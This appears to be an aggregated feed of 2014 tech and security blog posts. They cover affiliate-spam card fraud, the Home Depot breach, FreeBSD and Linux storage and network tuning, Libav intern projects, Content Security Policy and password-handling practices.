Affiliate programs are marketing machines built to sell a huge variety of products or services that are often of questionable quality and unknown provenance. Very often, affiliate programs are promoted using spam, and the stuff pimped by them includes generic prescription drugs, vitamins and “nutriceuticals,” and knockoff designer purses, watches, handbags, shoes and sports jerseys.

At the core of the affiliate program is a partnership of convenience: The affiliate managers handle the boring backoffice stuff, including the customer service, product procurement (suppliers) and order fulfillment (shipping). The sole job of the “affiliates” — the commission-based freelance marketers who sign up to promote whatever is being sold by the affiliate program — is to drive traffic and sales to the program.

THE NEW FACE OF SPAM

It is no surprise, then, that online affiliate programs like these often are overrun with scammers, spammers and others easily snagged by the lure of get-rich-quick schemes. In June, I began hearing from dozens of readers about unauthorized charges on their credit card statements for $49.95. The charges all showed up alongside various toll-free 888- numbers or names of customer support Web sites, such as supportacr[dot]com and acrsupport[dot]com. Readers who called these numbers or took advantage of the chat interfaces at these support sites were all told they’d ordered some kind of fat-burning pill or vitamin from some random site, such as greenteahealthdiet[dot]com or naturalfatburngarcinia[dot]com.

Those sites were among tens of thousands that are being promoted via spam, according to Gary Warner, chief technologist at Malcovery, an email security firm. The Web site names themselves are not included in the spam; rather, the spammers include a clickable URL for a hacked Web site that, when visited, redirects the user to the pill shop’s page. This redirection is done to avoid having the pill shop pages indexed by anti-spam filters and other types of blacklists used by security firms, Warner said.

The spam advertising these pill sites is not typical junk email blasted by botnet-infected home PCs, but rather is mostly “Webspam” sent via hacked Webmail accounts, said Damon McCoy, an assistant professor of computer science at George Mason University.

“Herbal spam from compromised Webmail accounts is a huge problem,” said McCoy, who has co-authored numerous studies on dodgy affiliate programs.

A support Web site named after the same number that appears on the “customer’s” credit card statement.
Several sources at financial institutions that have been helping customers battle these charges say most of those customers at one point in the past used their credit cards to donate to one of several religious, political activist, and social service organizations online. I may at some point post another story about this aspect of the fraud if I can firm it up any more.

McCoy believes that most of the fraudulent charges associated with these affiliate program Web sites are the result of rogue affiliates who are merely abusing the affiliate program to “cash out” credit card numbers stolen in data breaches or purchased from underground stores that sell stolen card data.

“My guess is these are ‘legit’ herbal affiliate programs that are getting burned by bad affiliates,” McCoy said.

Affiliate fraud was a major problem for the two captains of competing pharmacy spam affiliate programs who are profiled in my upcoming book, Spam Nation. Most of the affiliate programs featured in my book dealt with the problem of scammers trying to use stolen cards to generate phony sales by placing two-week “holds” or “holdbacks” on all affiliate commissions: That way, if an affiliate’s “purchases” generated too many chargebacks, the affiliate program could terminate the affiliate and avoid paying commissions on the fraudulent charges.

But McCoy said it’s likely that this herbal affiliate program is not employing holdbacks, at least not in any timeframe that could deter rogue affiliates from running stolen cards through the system.

“If this affiliate program doesn’t have a holdback, they are a great target for this type of fraud,” McCoy said.

As if in recognition of this problem, the herbal pill Web sites ultimately promoted in these Webspam attacks are tied to a sprawling network of thousands of similar sites, all of which come with their own dedicated customer support Web site and phone number (866- and 888- numbers). Those same support phone numbers are listed next to the fraudulent charges on customers’ monthly credit card statements. In virtually all cases, the organization names listed on these support Web sites are legally registered, incorporated companies based in Florida.

All of the banks I spoke with in researching this story said customers told them that the support staff answering the phones at the 888- and 866- numbers tied to the herbal pill sites were more than happy to reverse the fraudulent charges. The last thing these affiliate programs want is a bunch of chargebacks: Too many chargebacks can cause the merchant to lose access to Visa and MasterCard’s processing networks, and can bring steep fines.

Not that legitimate customers of these dodgy vitamin shops are in for the best customer service experience either.  Very often, ordering from one of these affiliate marketing programs invites even more trouble. A note appended in fine print to the bottom of the checkout page on all of the herbal pill sites advises: “As part of your subscription, you will automatically receive additional bottles every 3 Months. Your credit card used in this initial order will be used for future automatic orders, and will be charged $148.00 (Includes S/H).”

If you see charges like these or any other activity on your credit or debit card that you did not authorize, contact your bank and report the fraud immediately. I think it’s also a good idea in cases like this to request a new card in the odd chance your bank doesn’t offer it: After all, it’s a good bet that your card is in the hands of crooks, and is likely to be abused like this again.


A Daemonic Web Slingshot My Universe | 2014-09-21 19:15 UTC

Apache and Nginx are (at least according to Netcraft) among the most widely used web servers. If you run one of them on top of FreeBSD, you can make both of them considerably faster, and lower the system load along the way. No black magic is required, just a kernel module¹ named accf_http. The module is by no means new, by the way: it was introduced back in FreeBSD 4.0 and has therefore been around for a good 14 years.

Behind it is a module from the accept_filter family that is tailored specifically to the HTTP protocol. It makes FreeBSD's network stack receive the complete HTTP request before the socket signals to the application that an incoming connection has arrived. The web server's logic for parsing incomplete HTTP requests can thus safely be switched off, since the server can rely on every delivered request being complete.

Another side effect: incomplete requests no longer tie up a web server process or thread, which is why the Apache web server in particular benefits from the HTTP accept filter. Nginx works with non-blocking sockets and, unlike most Apache MPMs, does not reserve a dedicated thread or process per incoming connection, so incomplete requests do not drive Nginx to spawn additional processes or threads. Nginx still has to keep polling all open connections, however, to find out which of them finally holds a complete request.

By design, the resource savings are therefore not as large for Nginx as for Apache. But because only complete requests end up in the connection queue, request processing is sped up significantly, which matters most when answering the request itself takes hardly any compute time (for example because it is served from a cache). A heavyweight dynamic web application benefits less, since most of the total time goes into computing the response rather than receiving the request.

So how do you get this functionality? Apache users merely need to make sure the kernel module is loaded before the server starts, for example by adding it to /boot/loader.conf:

accf_http_load="YES"  
If the module is available, or was compiled into the kernel, Apache uses the accept filter without further ado. If it is not available, Apache even complains outright with a warning:

[warn] No such file or directory: Failed to enable the 'httpready' Accept Filter

Nginx, on the other hand, needs a little encouragement before it will use the accept filter:

server {  
    listen 127.0.0.1:80 accept_filter=httpready;
    ...
}
To be fair, it has to be said that this alone is not the whole story. To not merely save resources but actually gain performance, there is no way around looking into other tuning options as well, and finding settings that match the web server's actual workload. Relevant keywords here are the sysctl variables kern.ipc.soacceptqueue, kern.ipc.maxsockbuf, net.inet.tcp.sendspace and net.inet.tcp.recvspace. More extensive information is available, for example, in the Network Tuning Guide on Calomel.org.
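As a starting point, the variables named above can be set persistently in /etc/sysctl.conf. The values below are illustrative placeholders only, not recommendations; they have to be measured against the actual workload:

```shell
# /etc/sysctl.conf (FreeBSD) -- example values only, tune per workload
kern.ipc.soacceptqueue=1024    # depth of the listen(2) backlog queue
kern.ipc.maxsockbuf=2097152    # maximum socket buffer size in bytes
net.inet.tcp.sendspace=65536   # default TCP send buffer
net.inet.tcp.recvspace=65536   # default TCP receive buffer
```

Changes take effect at boot; individual values can also be tried at runtime with sysctl(8) before committing them to the file.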

1. Alternatively, the filter can be compiled directly into the kernel with options ACCEPT_FILTER_HTTP


Outreach Program for Women Luca Barbato | 2014-09-21 13:49 UTC

Libav participated in the summer edition of the OPW. We had three interns: Alexandra, Katerina and Nidhi.

Projects

The three interns had different starting skills so the projects picked had a different breadth and scope.

Small tasks

Everybody has to start with a simple task, and they did so as well. Polishing crufty code is one of the best ways to start learning how it works. In Libav's case we have plenty of spots that require extra care, and hidden bugs usually get uncovered that way.

Not so small tasks

Katerina decided to do something radical from the start: she tried to use coccinelle to fix a whole class of issues in one fell swoop. I'm still reviewing the patch and splitting it into smaller chunks to single out false positives. The patch itself put a spotlight on some of the most horrible code still lingering around; hopefully we'll get to fix those parts soon =)

Demuxer rewrite

Alexandra and Katerina showed interest in specific targeted tasks and honed their skills by reimplementing the ASF and RealMedia demuxers, respectively. They even participated in the first Libav Summer Sprint in Torino and worked together with their mentor in person.

They had to dig through the specifications and figure out why some sample files behave in unexpected ways.

They are almost there and hopefully our next release will see brand new demuxers!

Jack of all trades

Libav has plenty of crufty code that requires some love: plenty of overly long files, lots of small quirks that should be ironed out. Libav (like any other big project) needs some refactoring here and there.

Nidhi’s task was mainly focused on fixing some of those and helping others do the same by testing patches. She had to juggle many different tasks and learn about many different parts of the codebase and the toolset we use.

It might not sound as extreme as replacing ancient code with something completely new (and making it work at least as well as the former), but both kinds of tasks are fundamental to keeping the project healthy!

In closing

All the projects have been a success, and we are looking forward to seeing further contributions from our new members!


bcache Patrick's playground | 2014-09-21 11:59 UTC

My "sacrificial box", a machine reserved for any experimentation that can break stuff, has had annoyingly slow IO for a while now. I've had 3 old SATA harddisks (250GB) in a RAID5 (because I don't trust them to survive), and recently I got a cheap 64GB SSD, which initially became the new rootfs.

The performance difference between the SATA disks and the SSD is quite amazing, and the difference to a proper SSD is amazing again. Just for fun: the 3-disk RAID5 writes random data at about 1.5MB/s, the crap SSD manages ~60MB/s, and a proper SSD (e.g. Intel) easily hits over 200MB/s. So while this is not great hardware it's excellent for demonstrating performance hacks.

Recent-ish kernels finally have bcache included, so I decided to see if I could make use of it. Since creating new bcache devices is destructive, I copied all data away, reformatted the relevant partitions, and then set up bcache. So the SSD is now 20GB rootfs and 40GB cache. The RAID5 stays as it is, but gets reformatted with bcache.
In code:
wipefs -a /dev/md0 # erase old signatures to unconfuse bcache
make-bcache -C /dev/sda2 -B /dev/md0 --writeback --cache_replacement_policy=lru
mkfs.xfs /dev/bcache0 # no longer using md0 directly!
Now performance is still quite meh, what's the problem? Oh ... we need to attach the SSD cache device to the backing device!
ls /sys/fs/bcache/
45088921-4709-4d30-a54d-d5a963edf018  register  register_quiet
That's the UUID we need, so:
echo 45088921-4709-4d30-a54d-d5a963edf018 > /sys/block/bcache0/bcache/attach
and dmesg says:
[  549.076506] bcache: bch_cached_dev_attach() Caching md0 as bcache0 on set 45088921-4709-4d30-a54d-d5a963edf018
Tadaah!

So what about performance? Well ... without any proper benchmarks, just copying the data back I see very different behaviour. iotop shows writes happening at ~40MB/s, but as the network isn't that fast (100Mbit switch) it only writes for about a second every ~5 seconds.
Unpacking chromium is now CPU-limited and doesn't cause a minute-long IO storm. Responsiveness while copying data is quite excellent.

The write speed for random IO is a lot higher, reaching maybe two thirds of the SSD's native speed, but I now have 1TB of storage at that speed - for a $25 upgrade that's quite amazing.

Another interesting thing is that bcache is chunking up IO, so the harddisks are no longer making an angry purring noise with random IO, instead it's a strange chirping as they only write a few larger chunks every second. It even reduces the noise level?! Neato.

First impression: This is definitely worth setting up for new machines that require good IO performance, the only downside for me is that you need more hardware and thus a slightly bigger budget. But the speedup is "very large" even with a cheap-crap SSD that doesn't even go that fast ...

Edit: ioping, for comparison:
native sata disks:
32 requests completed in 32.8 s, 34 iops, 136.5 KiB/s
min/avg/max/mdev = 194 us / 29.3 ms / 225.6 ms / 46.4 ms

bcache-enhanced, while writing quite a bit of data:
36 requests completed in 35.9 s, 488 iops, 1.9 MiB/s
min/avg/max/mdev = 193 us / 2.0 ms / 4.4 ms / 1.2 ms


Definitely awesome!


The second BETA build for the FreeBSD 10.1 release cycle is now available. ISO images for the amd64, armv6, i386, ia64, powerpc, powerpc64 and sparc64 architectures are available on most of our FreeBSD mirror sites.


I started digging deeper into the RSS performance on my home test platform. Four cores and one (desktop) socket isn't all that much, but it's a good starting point for this.

It turns out that there was some lock contention inside netisr. Which made no sense, as RSS should be keeping all the flows local to each CPU.

After a bunch of digging, I discovered that the NIC was occasionally receiving packets into the wrong ring. Have a look at this:

Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100034:
m=0xfffff80047713d00; flowid=0x21f7db62; rxr->me=3
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100034:
m=0xfffff8004742e100; flowid=0x21f7db62; rxr->me=3
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100034:
m=0xfffff800474c2e00; flowid=0x21f7db62; rxr->me=3
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100034:
m=0xfffff800474c5000; flowid=0x21f7db62; rxr->me=3
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100034:
m=0xfffff8004742ec00; flowid=0x21f7db62; rxr->me=3
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100032:
m=0xfffff8004727a700; flowid=0x335a5c03; rxr->me=2
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100032:
m=0xfffff80006f11600; flowid=0x335a5c03; rxr->me=2
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100032:
m=0xfffff80047279b00; flowid=0x335a5c03; rxr->me=2
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100032:
m=0xfffff80006f0b700; flowid=0x335a5c03; rxr->me=2

The RX flowid was correct - I hashed the packets in software too and verified the software hash equaled the hardware hash. But they were turning up on the wrong receive queue. "rxr->me" is the queue id; the hardware should be hashing on the last 7 bits. 0x3 -> ring 3, 0x2 -> ring 2.
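To illustrate the expected mapping: the low 7 bits of the flow hash index the NIC's 128-entry redirection table. Assuming the common default of filling that table round-robin across the queues (an assumption on my part, not verified against the driver), the expected ring can be sketched like this; the helper name is hypothetical:

```python
# Hypothetical sketch: which RX ring a flow hash *should* land on,
# assuming a default redirection table filled round-robin across
# the queues (reta[i] = i % num_queues).

def expected_ring(flowid: int, num_queues: int) -> int:
    reta_index = flowid & 0x7F       # hardware uses the low 7 bits
    return reta_index % num_queues   # assumed round-robin RETA

# The flow hashes from the log above, on a 4-queue NIC:
print(expected_ring(0x21F7DB62, 4))  # → 2
print(expected_ring(0x335A5C03, 4))  # → 3
```

Under that assumption the two flows above should land on rings 2 and 3, yet the log shows them arriving on rings 3 and 2, consistent with the misconfiguration described below.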

It also only happened when I was sending traffic to more than one receive ring. Everything was okay if I just transmitted to a single receive ring.

Luckily for me, some developers from Verisign saw some odd behaviour in their TCP stress testing and had dug in a bit further. They were seeing corrupted frames on the receive side that looked a lot like internal NIC configuration state. They figured out that the ixgbe(4) driver wasn't initialising the flow director and receive units correctly - the FreeBSD driver was not correctly setting up the amount of memory each was allocated on the NIC and they were overlapping. They also found a handful of incorrectly handled errors and double-freed mbufs.

So, with that all fixed, their TCP problem went away and my UDP tests started properly behaving themselves. Now all the flows are ending up on the right CPUs.

The flow director code was also dynamically programming flows into the NIC to try to rebalance traffic. Trouble is, I think it's a bit buggy and likely not working well with large receive offload (LRO).

What's it mean for normal people? Well, it's fixed in FreeBSD-HEAD now. I'm hoping I or someone else will backport it to FreeBSD-10 soon. It fixes my UDP tests - now I hit around 1.3 million packets per second transmit and receive on my test rig; the server now has around 10-15% CPU free. It also fixed issues that Verisign were seeing with their high transaction rate TCP tests. I'm hoping that it fixes the odd corner cases that people have seen with Intel 10 gigabit hardware on FreeBSD and makes LRO generally more useful and stable.

Next up - some code refactoring, then finishing off IPv6 RSS!

 


I recently started playing around with Content Security Policy (CSP). CSP is a very neat feature and a good example of how to get IT security right.

The main reason CSP exists is cross-site scripting vulnerabilities (XSS). Every time a malicious attacker is able to somehow inject JavaScript or other executable code into your webpage, this is called an XSS. XSS vulnerabilities are among the most common vulnerabilities in web applications.

CSP fixes XSS for good

The approach to fixing XSS in the past was to educate web developers that they need to filter or properly escape their input. The problem with this approach is that it doesn't work. Even large websites like Amazon or eBay don't get this right. The problem, simply stated, is that there are just too many places in a complex web application where XSS vulnerabilities can be created. Fixing them one at a time doesn't scale.

CSP tries to fix this in a much more generic way: how can we prevent XSS from happening at all? The way to do this is for the web server to send a header that defines where JavaScript and other content (images, objects, etc.) is allowed to come from. If used correctly, CSP can prevent XSS completely. The problem with CSP is that it's hard to add to an already existing project, because if you want CSP to be really secure you have to forbid inline JavaScript. That often requires major re-engineering of existing code. Preferably, CSP should be part of the development process right from the beginning. If you start a web project, keep that in mind and educate your developers to use a restrictive CSP before they write any code. Starting a new web page without CSP these days is irresponsible.

To play around with it I added a CSP header to my personal webpage. This was a simple target, because it's a very simple webpage. I'm essentially sure that my webpage is XSS free because it doesn't use any untrusted input, I mainly wanted to have an easy target to do some testing. I also tried to add CSP to this blog, but this turned out to be much more complicated.

For my personal webpage this is what I did (PHP code):
header("Content-Security-Policy:default-src 'none';img-src 'self';style-src 'self';report-uri /c/");

The default policy is to accept nothing. The only things I use on my webpage are images and stylesheets and they all are located on the same webspace as the webpage itself, so I allow these two things.

This is an extremely simple CSP policy. To give you an idea how a more realistic policy looks like this is the one from Github:
Content-Security-Policy: default-src *; script-src assets-cdn.github.com www.google-analytics.com collector-cdn.github.com; object-src assets-cdn.github.com; style-src 'self' 'unsafe-inline' 'unsafe-eval' assets-cdn.github.com; img-src 'self' data: assets-cdn.github.com identicons.github.com www.google-analytics.com collector.githubapp.com *.githubusercontent.com *.gravatar.com *.wp.com; media-src 'none'; frame-src 'self' render.githubusercontent.com gist.github.com www.youtube.com player.vimeo.com checkout.paypal.com; font-src assets-cdn.github.com; connect-src 'self' ghconduit.com:25035 live.github.com uploads.github.com s3.amazonaws.com

Reporting feature

You may have noticed the "report-uri" directive at the end of my CSP header line. The idea is that whenever a browser blocks something via CSP, it can report this to the webpage owner. Why should we do this? Because we still want to fix XSS issues (there are browsers with little or no CSP support; I'm looking at you, Internet Explorer), and we want to know if our policy breaks anything that is supposed to work. The way this works is that a JSON document with details is sent via a POST request to the given URL.

While this sounds really neat in theory, in practice I found it quite disappointing. As I said above, I'm almost certain my webpage has no XSS issues, so I shouldn't get any reports at all. However, I get lots of them, and they are all false positives. The problem is browser extensions that execute things inside a webpage's context. Sometimes you can spot them (when source-file starts with "chrome-extension" or "safari-extension"), sometimes you can't (source-file will only say "data"). Sometimes this is triggered not by a single extension but by combinations of different ones (I found that the combination of HTTPS Everywhere and Adblock for Chrome triggered a CSP warning). I'm not sure how to handle this, or whether it is something that should be reported as a bug to the browser vendors or the extension developers.
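Browsers deliver the report as JSON with a top-level "csp-report" key. A minimal sketch of the server-side filtering one ends up doing; the function name and the extension heuristic are my own, not part of any standard:

```python
import json

# Hypothetical helper: pull the interesting fields out of a CSP
# violation report and guess whether a browser extension caused it.
def parse_csp_report(body: bytes) -> dict:
    report = json.loads(body)["csp-report"]
    source = report.get("source-file", "")
    return {
        "blocked": report.get("blocked-uri", ""),
        "violated": report.get("violated-directive", ""),
        "source": source,
        # Heuristic from the text: extension-injected scripts often
        # betray themselves through their source-file scheme.
        "likely_extension": source.startswith(
            ("chrome-extension", "safari-extension")
        ),
    }

sample = json.dumps({"csp-report": {
    "blocked-uri": "self",
    "violated-directive": "script-src 'self'",
    "source-file": "chrome-extension://abcdef",
}}).encode()
print(parse_csp_report(sample)["likely_extension"])  # → True
```

As the text notes, reports where source-file only says "data" cannot be classified this way, so a filter like this still leaves plenty of noise.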

Conclusion

If you start a web project, use CSP. If you have a web page that needs extra security, use CSP (my bank doesn't; does yours?). CSP reporting is neat, but its usefulness is limited due to too many false positives.

Then there's the bigger picture of IT security in general. Fixing single security bugs doesn't work. Why? XSS is as old as JavaScript (1995) and it's still a huge problem. An example for a simliar technology are prepared statements for SQL. If you use them you won't have SQL injections. SQL injections are the second most prevalent web security problem after XSS. By using CSP and prepared statements you eliminate the two biggest issues in web security. Sounds like a good idea to me.

Buffer overflows were first documented in 1972 and they are still the source of many security issues. Fixing them for good is trickier, but it is also possible.


Home Depot said today that cyber criminals armed with custom-built malware stole an estimated 56 million debit and credit card numbers from its customers between April and September 2014. That disclosure officially makes the incident the largest retail card breach on record.

The disclosure, the first real information about the damage from a data breach that was initially disclosed on this site Sept. 2, also sought to assure customers that the malware used in the breach has been eliminated from its U.S. and Canadian store networks.

“To protect customer data until the malware was eliminated, any terminals identified with malware were taken out of service, and the company quickly put in place other security enhancements,” the company said via press release (PDF). “The hackers’ method of entry has been closed off, the malware has been eliminated from the company’s systems, and the company has rolled out enhanced encryption of payment data to all U.S. stores.”

That “enhanced payment protection,” the company said, involves new payment security protection “that locks down payment data through enhanced encryption, which takes raw payment card information and scrambles it to make it unreadable and virtually useless to hackers.”

“Home Depot’s new encryption technology, provided by Voltage Security, Inc., has been tested and validated by two independent IT security firms,” the statement continues. “The encryption project was launched in January 2014. The rollout was completed in all U.S. stores on Saturday, September 13, 2014. The rollout to Canadian stores will be completed by early 2015.”

The remainder of the statement delves into updated fiscal guidance for investors on what Home Depot believes this breach may cost the company in 2014. But absent from the statement is any further discussion about the timeline of this breach, or information about how forensic investigators believe the attackers may have installed the malware mostly on Home Depot’s self-checkout systems — something which could help explain why this five-month breach involves just 56 million cards instead of many millions more.

As to the timeline, multiple financial institutions report that the alerts they’re receiving from Visa and MasterCard about specific credit and debit cards compromised in this breach suggest that the thieves were stealing card data from Home Depot’s cash registers up until Sept. 7, 2014, a full five days after news of the breach first broke.

The Target breach lasted roughly three weeks, but it exposed some 40 million debit and credit cards because hackers switched on their card-stealing malware during the busiest shopping season of the year. Prior to the Home Depot breach, the record for the largest retail card breach went to TJX, which lost some 45.6 million cards.


While we have many interesting modern authentication methods, password authentication is still the most popular choice for network applications. It’s simple, it doesn’t require any special hardware, it doesn’t discriminate anyone in particular. It just works™.

The key requirement for maintaining the security of a secret-based authentication mechanism is the secrecy of the secret (the password). Therefore, it is very important that the designer of a network application regards the safety of passwords as essential and does their best to protect them.

In particular, the developer can affect the security of passwords in three ways:

  1. through the security of server-side key storage,
  2. through the security of the secret transmission,
  3. through encouraging user to follow the best practices.
I will expand on each of them in order.



Security of server-side key storage

For secret-based authentication to work, the server needs to store some kind of secret-related information. Commonly, it stores the complete user password in a database. Since this can be valuable information, it should be especially well protected, so that even in case of unauthorized access to the system the attacker cannot obtain it easily.

This could be achieved through the use of key derivation functions, for example. In this case, a derived key is computed from the user-provided password and used in the system. With a good design, the password could actually never leave the client’s computer — it can be converted straight to the derived key there, and the derived key may be used from that point forward. Therefore, the best that an attacker could get is the derived key, with no trivial way of obtaining the original secret.
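As a sketch of the idea using PBKDF2 (the parameter choices below are illustrative assumptions, not a recommendation):

```python
import hashlib, os

# Sketch: derive a key from the password (ideally client-side); the
# server then only ever sees and stores the derived key, never the
# password itself. Iteration count here is purely illustrative.
def derive_key(password: str, salt: bytes, iterations: int = 100_000) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)

salt = os.urandom(16)  # per-user salt, stored alongside the derived key
key = derive_key("correct horse battery staple", salt)
print(len(key))  # → 32 (bytes)
```

The derivation is deterministic for a given password and salt, so the server can compare derived keys without ever handling the password.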

Another interesting possibility is restricting access to the password store. In this case, the user account used to run the application does not have read or write access to the secret database. Instead, a proxy service is used that provides necessary primitives such as:

  • authenticating the user,
  • changing user’s password,
  • and allowing user’s password reset.
It is crucial that none of those primitives can be used without proving the necessary user authorization. The service must provide no means to obtain the current password, or to set a new password without proving user authorization. For example, a password reset would have to be confirmed using an authentication token that is sent to the user’s e-mail address (note that the e-mail address must be securely stored too) directly by the password service — that is, bypassing the potentially compromised application.

Examples of such services are PAM and LDAP. In both cases, only the appropriately privileged system or network administrator has access to the password store, while every user can access the common authentication and password setting functions. In case a bug in the application serves as a backdoor to the system, the attacker does not have sufficient privileges to read the passwords.
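The shape of such a proxy service can be sketched as follows; the class and method names are my own invention (real deployments would use PAM or LDAP, as mentioned above). The point is that the interface deliberately offers no way to read a stored password:

```python
import hashlib, hmac, os

# Hypothetical sketch of a password-proxy service: the application can
# authenticate users and change passwords, but can never read the store.
class PasswordService:
    def __init__(self):
        self._store = {}  # user -> (salt, derived key); private to the service

    def set_password(self, user: str, password: str) -> None:
        salt = os.urandom(16)
        key = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
        self._store[user] = (salt, key)

    def authenticate(self, user: str, password: str) -> bool:
        if user not in self._store:
            return False
        salt, key = self._store[user]
        candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
        return hmac.compare_digest(candidate, key)  # constant-time compare

    def change_password(self, user: str, old: str, new: str) -> bool:
        # Changing the password requires proving knowledge of the old one.
        if not self.authenticate(user, old):
            return False
        self.set_password(user, new)
        return True

svc = PasswordService()
svc.set_password("alice", "hunter2")
print(svc.authenticate("alice", "hunter2"))        # → True
print(svc.change_password("alice", "wrong", "x"))  # → False
```

In a real system the store would live in a separate privileged process, so a compromise of the application account still yields no read access to the secrets.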

Security of secret transmission

The authentication process and other functions involving transmitting secrets over network are the most security-concerning processes in the password’s lifetime.

I think this topic has been satisfactorily described multiple times, so I will just summarize the key points briefly:

  1. Always use secured (TLS) connection both for authentication and post-authentication operations. This has multiple advantages, including protection against eavesdropping, message tampering, replay and man-in-the-middle attacks.
  2. Use sessions to avoid having to re-authenticate on every request. However, re-authentication may be desired when accessing data crucial to security — changing e-mail address, for example.
  3. Protect the secrets as early as possible. For example, if a derived key is used for authentication, prefer deriving it client-side before the request is sent. In the case of webapps, this could be done using ECMAScript, for example.
  4. Use secure authentication methods if possible. For example, you can use challenge-response authentication to avoid transmitting the secret at all.
  5. Provide alternate authentication methods to reduce the use of the secret. Asymmetric-key methods (such as client certificates or SSH pre-authentication) are both convenient and secure. One-time passwords can make the application safer to use on public terminals that can’t be trusted to be secure from keylogging.
  6. Support two-factor authentication if possible. For example, you can supplement password authentication with TOTP. Preferably, you may use the same TOTP parameters as Google Authenticator uses, effectively enabling your users to use multiple applications designed to serve that purpose.
  7. And most importantly, never ever send user’s password back to him or show it to him. For preventing mistakes, ask user to type the password twice. For providing password recovery, generate and send pseudorandom authorization token, and ask the user to set a new password after using it.
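Point 6 can be sketched with the parameters Google Authenticator uses (HMAC-SHA1, 30-second time steps, 6 digits); the function names below are my own:

```python
import hashlib, hmac, struct, time

# Sketch of RFC 4226 HOTP / RFC 6238 TOTP with the default parameters
# Google Authenticator uses (HMAC-SHA1, 30 s time step, 6 digits).
def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                     # dynamic truncation
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

def totp(secret: bytes, at=None, step: int = 30) -> str:
    t = int((time.time() if at is None else at) // step)
    return hotp(secret, t)

# RFC 4226 test vector: this secret at counter 0 yields 755224.
print(hotp(b"12345678901234567890", 0))  # → 755224
```

The server stores the shared secret per user and accepts the password only together with the current TOTP value, so a stolen password alone is not enough to authenticate.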

Best practices for user management of passwords

With server-side key storage and authentication secured, the only potential weakness left is the user’s system. While the application administrator can’t — or often shouldn’t — control it, they should encourage users to follow best practices for password security.

Those practices include:

  1. Using a secure, hard-to-guess password. Including a properly working password strength meter and a few tips is a good way of encouraging this. However, as explained below, a weak password should merely trigger a warning rather than a fatal error.
  2. Using different passwords for separate applications, to limit the damage if an attack on one of them results in the secret being obtained.
  3. If the user can’t memorize the password, using a dedicated, encrypted key store or a secure password derivation method. Examples of the former include built-in browser and system-wide password stores, as well as dedicated applications such as KeePass. An example of the latter is Entropass, which uses a user-provided master password and a salt constructed from the site’s domain.
  4. Using the password only in response to properly authenticated requests. In particular, the application should have a clear policy when the password can be requested and how the authenticity of the application can be verified.
A key point is that all the good practices should be encouraged; the developer should never attempt to force them. If there are to be any limitations on allowed passwords, they should be technical and flexible.

If there is to be a minimum length for a password, it should only aim to withstand the first round of a brute-force attack. Technically speaking, any limitation actually reduces entropy, since the attacker can safely omit short passwords. However, with the number of possibilities growing exponentially with length, this hardly matters.
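A quick back-of-the-envelope check makes this concrete (assuming the 95 printable ASCII characters):

```python
# How much of the keyspace does a minimum length of 8 discard?
# With 95 printable ASCII characters, passwords shorter than 8
# make up only a tiny sliver of all passwords up to length 8.
ALPHABET = 95
short = sum(ALPHABET ** n for n in range(1, 8))   # lengths 1..7
total = sum(ALPHABET ** n for n in range(1, 9))   # lengths 1..8
print(f"{short / total:.4%}")  # roughly 1% of the keyspace
```

So an attacker who skips everything shorter than 8 characters prunes only about one percent of the search space anyway.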

Similarly, requiring the password to contain characters from a specific set is a bad idea. While it may sound good at first, it is yet another way of reducing entropy and making the passwords more predictable. Think of the sites that require the password to contain at least one digit. How many users have passwords ending with the digit one (1), or maybe their birth year?

The worst offenders are the sites that do not support setting your own password, and instead force you to use a password generated by some kind of pseudo-random algorithm. Simply put, this is an open invitation to write the password down. And once written down in cleartext, the password is no longer a secret.

Setting low upper limits on password length is not a good idea either. It is reasonable to set some technical limitation, say, 255 bytes of printable ASCII characters. However, setting the limit much lower may actually reduce the strength of some users’ passwords and conflict with some derived keys.

Lastly, the service should clearly state when it may ask for the user’s password and how to check the authenticity of the request. This can involve generic instructions covering TLS certificate and domain name checks. It may also include site-specific measures like user-specific images on the login form.

Having a transparent security-related announcements policy and information page is a good idea as well. If a site provides more than one service (e.g. e-mail accounts), the website can list certificate fingerprints for the other services. Furthermore, any certificate or IP address changes can be preceded by a GPG-signed mail announcement.


The malicious software that unknown thieves used to steal credit and debit card numbers in the data breach at Home Depot this year was installed mainly on payment systems in the self-checkout lanes at retail stores, according to sources close to the investigation. The finding could mean thieves stole far fewer cards during the almost five-month breach than they might have otherwise.

A self-checkout lane at a Home Depot in N. Virginia.
Since news of the Home Depot breach first broke on Sept. 2, this publication has been in constant contact with multiple financial institutions that are closely monitoring daily alerts from Visa and MasterCard for reports about new batches of accounts that the card associations believe were compromised in the break-in. Many banks have been bracing for a financial hit that is much bigger than the exposure caused by the breach at Target, which lasted only three weeks and exposed 40 million cards.

But so far, banking sources say Visa and MasterCard have been reporting far fewer compromised cards than expected given the length of the Home Depot exposure.

Sources now tell KrebsOnSecurity that in a conference call with financial institutions today, officials at MasterCard shared several updates from the ongoing forensic investigation into the breach at the nationwide home improvement store chain. The card brand reportedly told banks that at this time it is believed that only self-checkout terminals were impacted in the breach, but stressed that the investigation is far from complete.

MasterCard also reportedly relayed that the investigation to date found evidence of compromise at approximately 1,700 of the nearly 2,200 U.S. stores, with another 112 stores in Canada potentially affected.

Officials at MasterCard declined to comment. Home Depot spokeswoman Paula Drake also declined to comment, except to say that, “Our investigation is continuing, and unfortunately we’re not going to comment on other reports right now.”


How much are your medical records worth in the cybercrime underground? This week, KrebsOnSecurity discovered medical records being sold in bulk for as little as $6.40 apiece. The digital documents, several of which were obtained by sources working with this publication, were apparently stolen from a Texas-based life insurance company that now says it is working with federal authorities on an investigation into a possible data breach.

